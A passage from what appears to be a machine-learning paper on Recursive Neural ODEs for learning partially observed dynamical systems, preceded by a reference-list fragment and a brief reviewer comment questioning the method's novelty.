arXiv:2006.04678, 2020. Shreyansh Daftry, J Andrew Bagnell, and Martial Hebert. Learning transferable policies for monocular reactive mav control. In 2016 International Symposium on Experimental Robotics, pp. 3–11. Springer, 2017. Siyu Dai, Andreas Hofmann, and Brian Williams. Automatic curricula via expert demonstrations. arXiv preprint arXiv:2106.09159, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE conference on computer vision and pattern recognition, pp. 248–255. Ieee, 2009. Michael Dennis, Natasha Jaques, Eugene Vinitsky, Alexandre Bayen, Stuart Russell, Andrew Critch, and Sergey Levine. Emergent complexity and zero-shot transfer via unsupervised environment design. Advances in neural information processing systems, 33:13049–13061, 2020. Ashley Edwards, Himanshu Sahni, Yannick Schroeker, and Charles Isbell. Imitating latent policies from observation. In International conference on machine learning, pp. 1755–1763. PMLR, 2019.
O1lR4vSw5x
I don’t see how eqs 14 and 16 are any different from standard neural ODE loss of eq 3. To me this is a reordering of the original simple loss into a more complicated version, which still looks like the same thing. The eqs 17-19 seem to be just gradient updates with Hessians. Ok, but can’t we directly use a second-order optimiser for the standard neural ODE loss?
Recursive Neural Ordinary Differential Equations for Partially Observed Systems Anonymous authors Paper under double-blind review Abstract Identifying spatiotemporal dynamics is a difficult task, especially in scenarios where latent states are partially observed and/or represent physical quantities. In this context, first-principle ordinary differential equation (ODE) systems are often designed to describe the system’s dynamics. In this work, we address the problem of learning parts of the spatiotemporal dynamics with neural networks when only partial information about the system’s state is available. Taking inspiration from recursive state estimation and Neural ODEs, we outline a general framework in which complex dynamics generated by differential equations with distinguishable states can be learned in a principled way. We demonstrate the performance of the proposed approach leveraging both numerical simulations and a real dataset extracted from an electro-mechanical positioning system. We show how the underlying equations fit into our formalism and demonstrate the improved performance of the proposed method when compared with standard baselines. 1 Introduction Ordinary differential equations (ODEs) are used to describe the state evolution of many complex physical systems in engineering, biology, and other fields of natural sciences. Traditionally, first-principle notions are leveraged in designing ODEs as a form to impose physical meaning and interpretability (Psichogios & Ungar [1992]) of latent states. A major issue, however, is the inherent complexity of real-world problems for which even carefully designed ODE systems cannot account for all aspects of the true underlying physical phenomenon (Karniadakis et al. [2021]). Moreover, we often require prediction of systems whose dynamics are not fully understood or are partially unknown (Imbiriba et al. [2022]). In this context, Neural ODEs (NODEs) (Chen et al. [2018]) emerged as a powerful tool for learning complex correlations directly from the data, where residual neural networks (NNs) are used to parameterize the hidden ODEs’ states. Extensions of NODE were developed to improve learning speed (Xia et al. [2021], Massaroli et al. [2021]) and learning longtime dependencies in irregularly sampled time series (Xia et al. [2021]). A major challenge in learning NODEs arises when latent states of interest contribute indirectly to the observations. This is the case when an unobserved state (in the sense that it is not measured) influences an observed state. In this scenario, NODE’s standard solutions, which are optimized using the adjoint method (Boltyanskiy et al. [1962]), are compromised. Furthermore, NODE systems may have infinitely many solutions since parameters and unobserved states are estimated jointly. As a consequence, even when the model is capable of fitting the data, unobserved states cannot be accurately inferred without incorporating some kind of prior information in the model (Demirkaya et al. [2021]). Recently, new hybrid strategies have focused on mixing first-principle models and NODEs to constrain the solution space and obtain meaningful estimations of missing states (Imbiriba et al. [2022], Demirkaya et al. [2021], Ghanem et al. [2021]). Despite the lack of a clear formalization, in these works the authors were imposing some kind of distinguishability among states by adding known parts of the dynamics, resulting in hybrid first-principle data-driven models. Nevertheless, these works focus on state estimation using data-driven components to improve or augment existing dynamics but fail to learn global models and do not scale for large parameterized models. In this paper, we propose a sequential optimization approach that at each time step solves an alternating optimization problem for learning system dynamics under partially observed states, when states... are distinguishable. The approach focuses on learning unknown dynamics from data where the state related to the unknown dynamics is unobserved. Since the dynamics is unknown, we assume it is described by parametric models such as NNs. The proposed solution leverages the relationship between many recursive state-space estimation procedures and Newton’s method (Humpherys et al., 2012) to develop an efficient recursive NODE learning approach capable of sequentially learning states and model parameters. The benefit of the sequential strategy is twofold: (1) reduce the need for accurate initial conditions during training; (2) avoids simultaneous estimation of all states, making second-order optimization methods feasible. Furthermore, the proposed approach exploits the distinguishable property of states by designing an alternating optimization strategy with respect to states and parameters. The result is an interconnected sequential optimization procedure, where at each step model parameters and data are used to estimate latent states, and corrected latent states are used to update the model parameters in the current optimization step. Such alternating optimization approach improves the optimization of system parameters since it estimates unobserved hidden states and uses them in learning system parameters. In the case of RNODE, it also prevents vanishing gradients. Moreover, we define distinguishable latent variables and test the proposed Recursive NODE (RNODE) in hybrid scenarios where NNs replace parts of the ODE systems such that the distinguishability of latent variables is kept. Finally, as a side effect of the recursive paradigm adopted the proposed strategy can assimilate data and estimate initial conditions by leveraging its sequential state estimation framework over past data. 2 RELATED WORK 2.1 PARTIAL OBSERVATION In the context of data-driven ODE designs, most learning frameworks assume that all states are observed in the sense that they are directly measured. This assumption does not reflect many real-world scenarios where a subset of the states are unobserved. GP-SSM is a well-established approach used for dynamic systems identification (McHutchon et al., 2015; Falongo et al., 2019). GP-SSM can be adapted by introducing a recognition model that maps outputs to latent states to solve the problem of partial measurements (Eleftheriadis et al., 2017). Nevertheless, these methods do not scale well with large datasets and are limited to small trajectories (Doerr et al., 2018). Indeed, (Doerr et al., 2018) minimizes this problem by using stochastic gradient ELBO optimization on minibatches. However, GP-SSM-based methods avoid learning the vector field describing the latent states and instead directly learn a mapping from a history of past inputs and observations to the next observation. Similar approaches to the recognition models have been used for Bayesian extensions of NODEs, where the NODE describes the dynamics of the latent state while the distribution of the initial latent variable given the observations and vice versa are approximated by encoder and decoder networks (Yildiz et al., 2019; Norcliffe et al., 2021). The encoder network, which links observations to latent state by a deterministic mapping or by approximating the conditional distribution, can also be a Recurrent Neural Network (RNN) (Rubanova et al., 2019; Kim et al., 2021; De Brouwer et al., 2019), or an autoencoder (Bakarji et al., 2023). Despite focusing on mapping observations to latent states with neural networks and autoencoders, these works were not demonstrated to learn parameterized models under partial observations. Moreover, this parameterized line of work of mapping observation to latent states suffers from undistinguishability problem since several latent inputs could lead to the same observation. Recently, sparse approaches such as (Bakarji et al., 2022) merged encoder networks to identify a parsimonious transformation of the hidden dynamics of partially observed latent states. Moreover, Nonlinear Observers and recognition models were combined with NODEs to learn dynamic model parameters from partial observations while enforcing physical knowledge in the latent space (Buisson-Fenet et al., 2022). Differently from the aforementioned methods, in this work, we propose a recursive alternating approach that uses alternating Newton updates to optimize a quadratic cost function with respect to states and model parameters. Furthermore, the proposed strategy provides a systematic way to estimate initial conditions from historical data. 2.2 SECOND ORDER NEWTON METHOD Despite the efficiency and popularity of many stochastic gradient descent methods (Robbins & Monro, 1951; Duchi et al., 2011; Hinton et al., 2012; Kingma & Ba, 2014) for optimizing NNs, great efforts have been devoted to exploiting second-order Newton methods where Hessian information is used, providing faster convergence (Martens & Grosse, 2015; Botev et al., 2017; Gower et al., 2016; Mokhtari & Ribeiro, 2014). When training neural networks, computing the inverse of the Hessian matrix can be extremely expensive (Goldfarb et al., 2020) or even intractable. To mitigate this issue, Quasi-Newton methods have been proposed to approximate the Hessian pre-conditioner matrix such as Shampoo algorithm (Gupta et al., 2018), which was extended in (Anil et al., 2020) to simplify blocks of the Hessian, and in (Gupta et al., 2018) to be used in variational inference second-order approaches (Peirson et al., 2022). Similarly, works in (Goldfarb et al., 2020; Byrd et al., 2016) focused on developing stochastic quasi-Newton algorithms for problems with large amounts of data. It was shown that recursive the extended Kalman filter can be viewed as Gauss-Newton method (Bell, 1994; Bertsekas, 1996). Moreover, Newton’s method was used to derive recursive estimators for prediction and smoothing (Humpherys et al., 2012). In this paper, we develop a recursive Newton method that mitigates the problem of partial observations of latent states. 3 MODEL AND BACKGROUND In this section, we describe our modeling assumptions, discuss the distinguishability of latent states, and present the time evolution of the resulting generative model. 3.1 MODEL In this work, we focus on stochastic differential equations (SDE) as defined in (Øksendal & Øksendal, 2003) to describe the evolution of system parameters \( \theta(t) \in \mathcal{P} \subset \mathbb{R}^{d_\theta} \), latent states \( x(t) \in \mathcal{X} \subset \mathbb{R}^{d_x} \), and observations (or measurements) \( y(t) \in \mathcal{Y} \subset \mathbb{R}^{d_y} \). The joint process can be described as: \[ \begin{align*} \dot{\theta}(t) &= g(\theta(t)) + \nu(t) \\ \dot{x}(t) &= f(x(t), \theta(t), u(t)) + \epsilon(t) \\ y(t) &= h(x(t)) + \zeta(t) \end{align*} \] where \( \nu(t), \epsilon(t) \) and \( \zeta(t) \) are Wiener processes. \( u(t) \in \mathcal{U} \subset \mathbb{R}^{d_u} \) is a vector of external inputs, and the functions \( g : \mathcal{P} \rightarrow \mathcal{P}, f : \mathcal{X} \times \mathcal{P} \times \mathcal{U}, \) and \( h : \mathcal{X} \rightarrow \mathcal{Y} \) describe the system parameters, latent and observation processes, respectively. To describe the evolution of system parameters \( \theta(t) \) and latent states \( x(t) \) we consider the process in equation 1 to be first-order Markov process evolving over time \( t \). The partial observation problem: Ideally, states \( x(t) \) would be directly observed, and thus appear as an element in \( y(t) \). In practice, some of these states could influence \( y(t) \) only indirectly by acting on other measurable states. That is when classical training fails. In this work, we are interested in learning the unknown dynamics governing unobserved states. Note that this scenario poses further challenges over the estimation process since the recovery of latent states can be compromised. 3.2 DISTINGUISHABILITY OF NONLINEAR SYSTEMS The task of recovering latent states \( x(t) \) from a sequence of observations and inputs \( \mathcal{D}_N \triangleq \{u(0), y(0), \ldots, u(N - 1), y(N - 1)\} \) rests on our ability to distinguish two observations \( h(x(t_a)) \) and \( h(x(t_b)) \) from one another. **Definition 3.1** We say that a pair of latent variables \( x(t_a) \) and \( x(t_b) \) are distinguishable with respect to a control sequence \( u(t) \in \mathcal{U} \subset \mathbb{R}^{d_u} \) if \[ h(x(t_a)) \neq h(x(t_b)) \quad \forall x(t_a) \neq x(t_b) \] Otherwise, we say that the pair is indistinguishable with respect to \( u(t) \). If under a control input \( u(t), h(x(t_a)) = h(x(t_b)) \), then the state estimator cannot identify the true state \( x \) since it can assume the true state to be \( x(t_a) \) when it’s \( x(t_b) \) and vice versa. Since our procedure relies on finding latent states \( x(t) \) given a control input \( u(t) \) and observation \( y(t) \) and uses it to identify the ODE system, by estimating the model parameters \( \theta(t) \), estimating the wrong state \( x(t) \) will result in finding the wrong model parameters, hence training will fail. A way to impose state distinguishability is to incorporate prior knowledge regarding the relationship of states focusing on achieving the properties stated in Definition 3.1. 3.3 Generative model In the continuous model presented in (1), a continuous-time description for the latent processes is assumed even though the observations are recorded at discrete time points. The time evolution of the states \( x(t) \) can therefore be expressed as time integration of (1) using an off-the-shelf ODE solver: \[ x(t_i) = x(t_{i-1}) + \int_{t_{i-1}}^{t_i} f(x(t), u(t), \theta(t)) \, dt + \int_{t_{i-1}}^{t_i} \frac{\partial e(t)}{\partial t} \, dt \\ = \text{ODESolve}(f, x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}), t_{i-1}, t_i) + e(t) \] we define \[ f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1})) = \text{ODESolve}(f, x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}), t_{i-1}, t_i) + e(t) \] and \[ g_o(\theta(t_{i-1})) = \text{ODESolve}(g, \theta(t_{i-1}), t_{i-1}, t_i), \theta(t_{i-1}) + \nu(t). \] Based on the continuous model presented in (1) we present the time evolution of the latent states by the following generative model: \[ \theta(t_i) = g_o(\theta(t_{i-1})) + \nu(t) \\ x(t_i) = f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1})) + e(t) \\ y(t_i) = h(x(t_i)) + \zeta(t). \] ![Figure 1: The generative model (left panel), and one step of RNODE (right panel).](image) 4 Method Recursive Neural Ordinary Differential Equations (RNODE) finds the model parameters \( \theta(t) \) and latent states \( x(t) \) given a dataset \( D \triangleq \{u(t_0), y(t_0), \ldots, u(t_{N-1}), y(t_{N-1})\} \) of discrete observations and control inputs when \( x(t) \) is partially observed. Inspired by previous work describing the link between second-order Newton’s method and the Kalman filter (Humpherys et al., 2012), the cost function \( L \) is updated and solved sequentially to find latent states \( x(t) \) and model parameters \( \theta(t) \) in one unified framework. RNODE assumes model distinguishability which implies that latent states \( x(t) \) are recoverable from observations \( y(t) \). In this context, we break the optimization steps into two concerning optimization with respect to \( x(t) \) and \( \theta(t) \). 4.1 Sequential Newton Derivation We denote by \( \Theta_N = [\theta(t_0), \ldots, \theta(t_N)] \) and \( X_N = [x(t_0), \ldots, x(t_N)] \) to be the set of latent states sampled at \( t_0, t_1, \ldots, t_N \). To train the model, we optimize \( (\Theta_N, X_N) \) to minimize a quadratic cost function starting from initial \( \{x(t_0), \theta(t_0)\} \) using a collection of combined observation and input sequences \( D \) where the cost function is defined as: \[ L_N(\Theta_N, X_N) = \frac{1}{2} \sum_{i=1}^{N} \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|_{Q_x^{-1}}^2 \\ + \|y(t_i) - h(x(t_i))\|_{R_y^{-1}}^2 + \|\theta(t_i) - g_o(\theta(t_{i-1}))\|_{Q_\theta^{-1}}^2. \] where $Q_x$, $R_y$ and $Q_\theta$ are known positive definite matrices, and $\|a - b\|_A^{-1} = (a - b)^T A^{-1}(a - b)$. As the Hessian’s inverse is in general intractable, finding optimal solution $(\Theta_N^*, X_N^*)$ using the second order Newton method over the whole data set of size $N$ is unfeasible. For this reason, we resort to a sequential strategy by introducing a modified quadratic function $L_i(\Theta_i, X_i)$. Let us re-write the cost function at time $t_i$ as: $$L_i(\Theta_i, X_i) = L_{i-1}(\Theta_{i-1}, X_{i-1}) + \frac{1}{2} \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|^2_{Q_x^{-1}}$$ $$+ \frac{1}{2} \|y(t_i) - h(x(t_i))\|^2_{R_y^{-1}} + \frac{1}{2} \|\theta(t_i) - g_o(\theta(t_{i-1}))\|^2_{Q_\theta^{-1}}$$ (8) where $L_{i-1}(\Theta_{i-1}, X_{i-1})$ and $L_i(\Theta_i, X_i)$ are the cost functions at times $t_{i-1}$ and $t_i$, respectively; $\Theta_i = [\theta(t_0), \ldots, \theta(t_i)]$ and $X_i = [x(t_0), \ldots, x(t_i)]$. In the sequential optimization paradigm, $\Theta_{i-1}$ and $X_{i-1}$ are assumed known and at the $i$-th optimization step is performed only with respect to $\{\theta(t_i), x(t_i)\}$. When $\{\theta(t_i), x(t_i)\}$ are determined jointly such as in (Humpherys et al., 2012), the optimization process will suffer from vanishing gradients under partial observations. However, if $x(t_i)$ is distinguishable, we can circumvent the vanishing gradient problem by first optimizing with respect to $x(t_i)$ and then $\theta(t_i)$. This will allow us to circumvent the partial observability problem and enable the use of an estimate of the unobserved state in training. To do so, we break the optimization function (8) into four alternating optimization procedures aiming at finding $\hat{x}(t_i)$ and then finding $\hat{\theta}(t_i)$ that minimizes (8) given $\hat{x}(t_i)$. Let us begin by defining two intermediate optimization functions $L_{i|i-1}^x$ and $L_{i|i-1}^\theta$ in (9) and (10) respectively as follows: $$L_{i|i-1}^x(\Theta_i, X_i) = L_{i-1}(\Theta_{i-1}, X_{i-1}) + \frac{1}{2} \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|^2_{Q_x^{-1}}$$ $$+ \frac{1}{2} \|\theta(t_i) - g_o(\theta(t_{i-1}))\|^2_{Q_\theta^{-1}}$$ (9) and $$L_{i|i-1}^\theta(\Theta_i, X_i) = L_{i-1}(\Theta_{i-1}, X_{i-1}) + \frac{1}{2} \|\theta(t_i) - g_o(\theta(t_{i-1}))\|^2_{Q_\theta^{-1}}.$$ (10) We proceed by optimizing (9) for $x(t_i)$ and (10) for $\theta(t_i)$, yielding the respective solutions below: $$\hat{\theta}(t_i|t_{i-1}) = g_o(\hat{\theta}(t_{i-1}))$$ $$\hat{x}(t_i|t_{i-1}) = f_o(\hat{x}(t_{i-1}), \hat{\theta}(t_{i-1})).$$ (11) Next, we define the two optimization functions responsible for the update steps for states and parameters. Specifically, we define $L_i^x$ as: $$L_i^x(\Theta_i, X_i) = L_{i|i-1}^x(\Theta_i, X_i) + \|y(t_i) - h(x(t_i))\|^2_{R_y^{-1}}$$ (12) to be optimized with respect to $x(t_i)$ by minimizing $L_i^x$ given intermediate values of equation (11) where: $$\hat{x}(t_i) = \hat{x}(t_i|t_{i-1}) - \left[(\nabla^2 L_i^x(\Theta_i, X_i))^{-1}\right]_{i,:} \nabla L_i^x(\Theta_i, X_i)$$ (13) The solution to the problem above is given by given by (16). Equivalently, we define the update optimization function $L_i^\theta$ as: $$L_i^\theta(\Theta_i, X_i) = L_{i|i-1}^\theta(\Theta_i, X_{i-1}) + \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|^2_{Q_x^{-1}}$$ $$+ \|y(t_i) - h(x(t_i))\|^2_{R_y^{-1}}$$ (14) to be optimized with respect to $\theta(t_i)$ by minimizing $L_i^\theta$ given intermediate values of equation (11) and (16) as follows: $$\hat{\theta}(t_i) = \hat{\theta}(t_i|t_{i-1}) - \left[(\nabla^2 L_i^\theta(\Theta_i, X_{i-1}))^{-1}\right]_{i,:} \nabla L_i^\theta(\Theta_i, X_{i-1})$$ (15) The resulting optimal variable $\hat{\theta}(t_i)$ is given by (17). The procedure is repeated until $t_i = t_N$. We present our main result in the following theorem: Theorem 4.1 Given \( \hat{\theta}(t_{i-1}) \in \hat{\Theta}_{i-1} \) and \( \hat{x}(t_{i-1}) \in \hat{X}_{i-1} \), and known \( P_{\theta_{i-1}} \in R^{d_\theta \times d_\theta} \) and \( P_{x_{i-1}} \in R^{d_x \times d_x} \), the recursive equations for computing \( \hat{x}(t_i) \) and \( \hat{\theta}(t_i) \) that minimize \( \mathcal{L}_t \) are given by the following: \[ \hat{x}(t_i) = f_o(\hat{x}(t_{i-1}), \hat{\theta}(t_{i-1})) - P_{x_i} H_i^T (H_i P_{x_i} H_i^T + R_y)^{-1} \left[ h(f_o(\hat{x}(t_{i-1}), \hat{\theta}(t_{i-1}))) - y(t_i) \right] \] (16) \[ \hat{\theta}(t_i) = g_o(\hat{\theta}(t_{i-1})) - G_{\theta_{i-1}} P_{\theta_i} F_{\theta_{i-1}}^T \left[ f_o(\hat{x}(t_{i-1}), \hat{\theta}(t_{i-1})) - \hat{x}(t_i) \right] \] (17) with \( P_{\theta_i}, P_{x_i} \) being intermediate matrices and \( P_{\theta_i} \) and \( P_{x_i} \) being the lower right blocks of \( (\nabla^2 \mathcal{L}_t)^{-1} \) and \( (\nabla^2 \mathcal{L}_t^o)^{-1} \) respectively: \[ P_{\theta_i} = P_{\theta_{i-1}} - P_{\theta_{i-1}} F_{\theta_{i-1}}^T \left( Q_x + F_{\theta_{i-1}} P_{\theta_{i-1}} F_{\theta_{i-1}}^T \right) F_{\theta_{i-1}} P_{\theta_{i-1}} \] \[ P_{x_i} = F_{x_{i-1}} P_{x_{i-1}} F_{x_{i-1}} + Q_x \] \[ P_{x_i} = P_{x_i} [I + H_i (R_y - H_i P_{x_i} H_i^T) H_i P_{x_i}] \] \[ P_{\theta_i} = Q_{\theta_i} + G_{\theta_{i-1}} P_{\theta_i} G_{\theta_{i-1}} \] with \( H_i, F_{x_{i-1}}, G_{\theta_{i-1}}, \) and \( F_{\theta_{i-1}} \) being the jacobians of the vector fields \( h, f_o \) and \( g_o \) at \( \hat{x}(t_i|t_{i-1}), \hat{x}(t_{i-1}) \) and \( \hat{\theta}(t_{i-1}) \): \[ H_i = \frac{\partial h(\hat{x}(t_i|t_{i-1}))}{\partial \hat{x}(t_i|t_{i-1})}, \quad F_{x_{i-1}} = \frac{\partial f_o(\hat{x}(t_{i-1}), \hat{\theta}(t_{i-1}))}{\partial \hat{x}(t_{i-1})}, \quad F_{\theta_{i-1}} = \frac{\partial f_o(\hat{x}(t_{i-1}), \hat{\theta}(t_{i-1}))}{\partial \hat{\theta}(t_{i-1})} \] and \( G_{\theta_{i-1}} = \frac{\partial g_o(\hat{\theta}(t_{i-1}))}{\partial \hat{\theta}(t_{i-1})} \). The proof of Theorem 4.1 is provided in Appendix A. As a consequence of Theorem 4.1, \( \hat{x}(t_i) \) is computed according to (16) using \( \hat{\theta}(t_{i-1}) \). \( \hat{\theta}(t_i) \) is computed afterwards according to (17) using \( \hat{x}(t_i) \) that was previously found in (16). This alternating procedure between \( x(t_i) \) and \( \theta(t_i) \) is explained in the right panel of Figure 1, which depicts the four alternate optimization steps performed for each iteration \( t_i \). The computational complexity of RNODE is detailed in Appendix D. An epoch of the RNODE has a complexity of \( O(N(d_\theta^3 + 2d_\theta^2 d_x + 2d_\theta d_x^2)) \). Under the assumption that \( d_\theta \gg d_x \) the complexity becomes \( O(N(2d_\theta^2 d_x + 2d_\theta d_x^2)) \). During testing, however, the complexity becomes \( O(d_\theta) \) per step if integrating the learned mean vector field. 4.2 Obtaining initial condition from historical data Obtaining initial conditions \( x(t_0) \) during test time is often challenging. However, the proposed recursive framework can easily provide an estimate of the initial condition if historical data \( \mathcal{D}_H \triangleq \{u(t_{-N}), y(t_{-N}), \ldots, u(t_0), y(t_0)\} \) is available as described in equation 58 in Appendix C. Thus, given the model \( \theta^* \) we can exploit the update equation for the states, see (17), to provide \( \hat{x}(t_0) \). 5 Experiments The performance of RNODE is assessed in comparison to state-of-the-art model learning methods on several challenging non-linear simulations and real-world datasets. We employed five different dynamical models to demonstrate the effectiveness of the proposed approach. For each dynamical model, we assumed that we don’t have parts of the governing dynamics available, and replaced them with a neural network. In all of our experiments, we assume the latent process to be constant, that is \( g(\theta(t)) = 0 \), since optimal \( \theta(t)^* \) should be constant. Euler integrator is used as the ODE solver for efficiency and fast computation speed. Since the proposed mechanism rests on determining unobserved latent states from observed measurements, successful learning of the model relies on the distinguishability of latent states as defined in Definition 3.1. To ensure that, we assume partial knowledge of system ODE’s. As benchmark methods, we compared RNODE with three other well-established techniques for dynamical machine learning, namely NODE (Chen et al., 2018), RM (Buisson-Fenet et al., 2022). and PR-SSM (Doerr et al., 2018). Currently, no code is available for the model learning frameworks presented in (Eleftheriadis et al., 2017). Moreover, the available code related to the works in (McHutchon et al., 2015; Ialongo et al., 2019) could be modified to account for the partial observation scenario. However, these algorithms become computationally unfeasible for medium and large datasets (Doerr et al., 2018). For that reason, we were not able to benchmark against these approaches. We emphasize that modifying the above-mentioned methods to either account for the ODE structure or make them computationally tractable is out of the scope of this paper. This also applies to the PRSSM method. Nevertheless, for the sake of providing comparative results, we still include results using PR-SSM which is computationally more efficient than other Gaussian process-based models but does not account for the ODE structure. The benchmark results are summarized in Table 1, which represents normalized Root Mean Square Error (nRMSE) values for each model and method. In Figs. 2–5, we compare RM, PR-SSM, and our proposed method. All results were obtained with learned mean vector field integrated over time. Each subfigure represents the dynamics of a single state and contains ODE solutions for each method. We computed nRMSE using \( \text{nRMSE} = \frac{\sqrt{\sum_{i=1}^{n}(x(t_i) - \hat{x}(t_i))^2}}{\max(x(t)) - \min(x(t))} \), where \( \hat{x}(t_i) \) and \( x(t_i) \) are the estimated and true states at time \( t_i \), respectively, and \( n \) is the number of data points. Table 1: Comparison of nRMSE values for different dynamical models and methods. | Methods | Neuron model | Yeast Glycolysis | Cart-pole | Harmonic Oscillator | EMPS | |------------------|--------------|------------------|-----------|---------------------|------| | RM (Buisson-Fenet et al., 2022) | 2.39 \cdot 10^{-1} | 6.30 \cdot 10^{-1} | 1.06 \cdot 10^0 | 2.36 \cdot 10^{-2} | 6.20 \cdot 10^{-1} | | PR-SSM (Doerr et al., 2018) | 4.05 \cdot 10^{-1} | 1.59 \cdot 10^0 | 1.52 \cdot 10^0 | 1.21 \cdot 10^0 | 4.05 \cdot 10^{-1} | | NODE (Chen et al., 2018) | 7.03 \cdot 10^1 | 3.74 \cdot 10^{-1} | 2.84 \cdot 10^{-1} | 4.65 \cdot 10^{-1} | 1.65 \cdot 10^0 | | RNODE (Proposed) | 1.54 \cdot 10^{-1} | 3.39 \cdot 10^{-2} | 9.41 \cdot 10^{-3} | 5.08 \cdot 10^{-3} | 9.50 \cdot 10^{-2} | 5.1 Hodgkin-Huxley Neuron Model The renowned Hodgkin-Huxley Neuron Model (HH) (Hodgkin & Huxley, 1952) is an ODE system that describes the membrane dynamics of action potentials in neurons, which are electrical signals used by neurons to communicate with each other. The model has four states: \( V_m \) is the membrane potential, \( n_{gate} \), \( m_{gate} \), and \( h_{gate} \) are gating variables controlling the membrane’s ionic permeability. The equations governing the ODE system are provided in Eqs. 46–49 of the Appendix B.2. We train our recursive model with the assumption that Eq. 49 governing dynamics of \( h_{gate} \) is unknown and its corresponding state is not observed, i.e., \( y(t_i) = (V_m(t_i), n_{gate}(t_i), m_{gate}(t_i)) \). We replace the dynamics describing \( h_{gate}(t) \) by a neural network consisting of three layers. The first layer is a 20 units layer followed by an Exponential Linear Unit (ELU) activation function, second layer is also a 20 unit layer followed by a tanh activation function. The last layer consists of 10 units with a sigmoid activation function. We generate our dataset by applying a constant control input \( u(t_i) \) to the HH model described in 46–49 for 50000 time steps with \( dt = 10^{-3}s \) and by collecting measurements and inputs \( D \triangleq \{u(t_0), y(t_0), \ldots, u(t_{N-1}), y(t_{N-1})\} \). We train our model on \( D \) with \( P_{x_0} = 10^{-2}I_{d_x}, P_{\theta_0} = 10^2I_{d_\theta}, R_y = 10^{-10}I_{d_y}, Q_x = 10^{-5}I_{d_x} \) and \( Q_\theta = 10^{-2}I_{d_\theta} \). At the beginning of each epoch, we solve the problem 58 of the Appendix C to get the initial condition. Final optimal parameters \( \hat{\theta}(t_N) \) and initial condition \( \hat{x}(t_0) \) are saved and collected at the end of training. Fig. 2 depicts the dynamics of the system $\hat{\theta}(t_N)$ generated according to the generative model described in Eq (3) starting from initial condition $\hat{x}(t_0)$. The lower right panel demonstrates the superiority of the proposed model at learning $h_{gate}$. To demonstrate the robustness of RNODE to different dynamical regimes and showcase its capability of estimating accurate initial conditions, we perform an additional experiment. For this, we generate data $D_T$ with $N = 50,000$ samples using the HH model with different initial conditions from the ones used during training. From this data, we reserve the first 100 samples for learning the initial condition before performing integration for the remaining 49,900 samples. Then, using the learned model $\hat{\theta}(t_N)$ and the procedure described in Section 4.2, we obtained the initial condition $\hat{x}(t_{100})$ and obtained the RNODE solution. Figure 3 shows the evolution of the RNODE attesting to its capability of both estimating accurate initial conditions and generalization to other dynamical regimes. ### 5.2 Cart-Pole System We demonstrate the efficacy of the proposed RNODE in learning the non-linear dynamics of the cart-pole system. The system is composed of a cart running on a track, with a freely swinging pendulum attached to it. The state of the system consists of the cart’s position and velocity, and the pendulum’s angle and angular velocity, while a control input $u$ can be applied to the cart. We used the LQR [Prasad et al., 2011] algorithm to learn a feedback controller that swings the pendulum and balances it in the inverted position in the middle of the track. The equations governing the ODE system are provided in Eqs (54)-(57) of the Appendix B.5. We train our recursive model with the assumption that we don’t know the equation corresponding to $\dot{\phi}$ governing dynamics of the cart-pole’s angular rate. Therefore, we replace Eqs. (55) and (57) with a two-layer neural network with tanh activation function on each layer. We don’t measure cart-pole’s velocity $\dot{z}(t_i)$ and angular rate $\dot{\phi}(t_i)$, i.e., $y(t_i) = [z(t_i), \phi(t_i)]$. We generate our dataset by applying LQR balancing controller to the cart-pole described in Eqs (54)-(57) for 5000 time steps with $dt = 10^{-3}s$ and by collecting measurements and inputs $D \triangleq \{u(t_0), y(t_0), \ldots, u(t_{N-1}), y(t_{N-1})\}$. We train our model on $D$ with $P_{x_0} = 10^{-2}I_{d_x}, P_{\theta_0} = 10^2I_{d_\theta}, R_y = 10^{-10}I_{d_y}, Q_x = 10^{-5}I_{d_x}$ and $Q_\theta = 10^{-2}I_{d_\theta}$. At the beginning of each epoch, we solve problem (58) of the Appendix C to get the initial condition. Final optimal parameters $\hat{\theta}(t_N)$ and initial condition $\hat{x}(t_0)$ are saved and collected at the end of training. We qualitatively assess the performance of our model by feeding the control sequence stored in $D$ and parameters $\hat{\theta}(t_N)$ to the RNODE according to the generative model described in Eq (3) starting from initial condition $\hat{x}(t_0)$. In Figure 4, we demonstrate the ability of the proposed RNODE to learn the underlying dynamics of the system partially observed data compared to RM and PR-SSM methods. Table I show that RNODE clearly outperforms the competing algorithms with nRMSE value that is 99.3%, 99.1% and 97.67% smaller than the nRMSEs obtained by PR-SMM, RM, and NODE respectively. Analyzing the evolution of the latent states depicted in Figure 4, we notice that RNODE provides state trajectories that match the ground truth (GT) while the other two methods fail to capture the true trajectory. In fact, PR-SSM presents acceptable trajectories of $\dot{z}$ and $\ddot{z}$ but fails to learn $\phi$ and $\ddot{\phi}$ trajectories. On the other hand RM presents acceptable trajectories of $\phi$ and $\ddot{\phi}$ but fails to learn $z$ and $\dot{z}$ trajectories. Moreover, the NODE successfully learns the observed $\phi$ and $z$ trajectories but fails to learn correct trajectories of the unobserved states $\ddot{\phi}$ and $\dot{z}$. Both RM and PR-SSM estimated state trajectories are much more inaccurate than the one provided by RNODE. The main reason for this inaccuracy is that trajectory generation is run using a pre-computing control sequence $U \triangleq \{u(t_0), \ldots, u(t_{N-1})\} \in D$, hence any inaccuracy in the learned dynamics would cause the trajectories to go way off the ground truth (GT) due to the nonlinearity of the cart-pole system. This shows the challenging nature of the problem and the proposed approach’s efficiency in learning challenging nonlinear dynamics. In this context, RNODE’s superior performance is due to its alternating optimization approach since estimates of unobserved states become available when optimizing $\theta$. This feature is unavailable in the competing methods. 5.3 ELECTRO-MECHANICAL POSITIONING SYSTEM Here we evaluate the proposed RNODE on real data from an electro-mechanical positioning system described in (Janot et al., 2019). The training Dataset consists of system’s of position, velocity, and control inputs used. The dataset consists of 24801 data points for each state and control input with $dt = 10^{-3}s$. In a similar fashion to the HH and cart-pole systems, we train the RNODE using position and control inputs. We replace the velocity’s dynamics by a neural network of two layers of 50 and 20 units respectively followed by a tanh activation function. Table 1 show that RNODE clearly outperforms 